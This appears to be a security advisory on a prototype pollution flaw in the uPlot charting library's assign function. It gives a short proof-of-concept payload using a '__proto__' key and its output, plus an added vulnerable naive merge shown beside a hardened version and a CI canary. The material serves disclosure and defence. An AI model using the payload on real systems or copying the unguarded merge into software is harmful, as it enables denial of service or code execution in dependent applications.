μPlot is a fast, memory-efficient Canvas 2D-based chart for plotting time series, lines, areas, ohlc & bars.

Affected versions of this package are vulnerable to Prototype Pollution via the uplot.assign function, which does not check whether a source attribute resolves to the object prototype. The module is vulnerable through its assign function: properties are copied from the source object to the destination without proper validation of user-controlled input. An attacker can exploit this vulnerability by utilizing the built-in property __proto__. An immediate consequence of such a vulnerability is Denial of Service (DoS) by overwriting built-in APIs, e.g., toString. However, this could also lead to a high-profile exploit such as privilege escalation or arbitrary code execution (ACE), if this package is used as a dependency of another application or package in which the polluted data finds its way to a suitable gadget.
```javascript
// Proof of concept from the advisory: an attacker-controlled object carrying an
// own "__proto__" key is passed to uplot.assign, which copies it onto Object.prototype.
(async () => {
  const mod = await import('uplot');
  const lib = mod.default ?? mod; // uPlot is the module's default export; fall back to the namespace

  // JSON.parse creates "__proto__" as an ordinary own property (an object literal would not).
  const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  const victim = {}; // any unrelated object inherits from Object.prototype

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.assign({}, BAD_JSON);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  delete Object.prototype.polluted; // clean up so the process is not left polluted
})();
```
Output:

```
Before Attack: {}
After Attack: {"polluted":true}
```

The successful fix should give:

```
Before Attack: {}
After Attack: {}
```
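For comparison, here is an added example (not uPlot's own code, and not the fix the project shipped) showing the check the description above says is missing: a recursive assign that skips prototype-controlling keys, beside a naive merge that copies every key, plus a small canary that a test suite can run after merging untrusted options to detect pollution. The names naiveAssign, safeAssign and prototypeIsClean and the option names are assumptions made for the illustration; the payload is the advisory's, constructed inline.

```javascript
// Added example, not uPlot's own code: a deep assign that refuses to walk into
// prototype-controlling keys, beside a naive merge that lacks the check. The names
// naiveAssign, safeAssign and prototypeIsClean are illustrative; nothing here calls
// uplot.assign.

// Keys that, when copied from an untrusted object, can reach Object.prototype.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Naive recursive assign with the missing check: every key of src is copied.
// JSON.parse('{"__proto__":{...}}') yields an own, enumerable "__proto__" key, so
// dst[key] resolves to Object.prototype and the recursion writes into it.
function naiveAssign(dst, src) {
  for (const key in src) {
    const val = src[key];
    if (isPlainObject(val)) {
      if (!isPlainObject(dst[key])) dst[key] = {};
      naiveAssign(dst[key], val);
    } else {
      dst[key] = val;
    }
  }
  return dst;
}

// Hardened variant: own keys only, blocked keys skipped, and nested targets are
// created as prototype-less objects so no inherited property can be reached.
function safeAssign(dst, src) {
  for (const key of Object.keys(src)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = src[key];
    if (isPlainObject(val)) {
      const ownPlain = Object.prototype.hasOwnProperty.call(dst, key) && isPlainObject(dst[key]);
      if (!ownPlain) dst[key] = Object.create(null);
      safeAssign(dst[key], val);
    } else {
      dst[key] = val;
    }
  }
  return dst;
}

// Canary a test suite can run after merging untrusted configuration: a clean
// Object.prototype exposes no enumerable keys.
function prototypeIsClean() {
  return Object.keys(Object.prototype).length === 0;
}

// The advisory's payload (constructed here) run through the hardened merge.
function demoSafeMerge() {
  const badJson = JSON.parse('{"__proto__":{"polluted":true}}');
  const out = safeAssign({}, badJson);
  return {
    outKeys: Object.keys(out),   // the "__proto__" key was skipped, so nothing was copied
    polluted: ({}).polluted,     // Object.prototype untouched
    clean: prototypeIsClean(),
  };
}

// Ordinary nested options (constructed, uPlot-like) still merge as expected.
function demoNormalMerge() {
  const defaults = { scales: { x: { time: true } }, legend: { show: true } };
  const userOpts = { scales: { x: { time: false } }, title: 'Latency' };
  return safeAssign(defaults, userOpts);
}

console.log(demoSafeMerge());
console.log(JSON.stringify(demoNormalMerge()));
```

Skipping the three blocked keys stops the traversal before it can reach a prototype, and using Object.create(null) for freshly created nested targets removes the inherited chain entirely; the canary is cheap enough to run in CI after any merge of user-supplied options.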
Refer to the recommendations in this article on Snyk.io.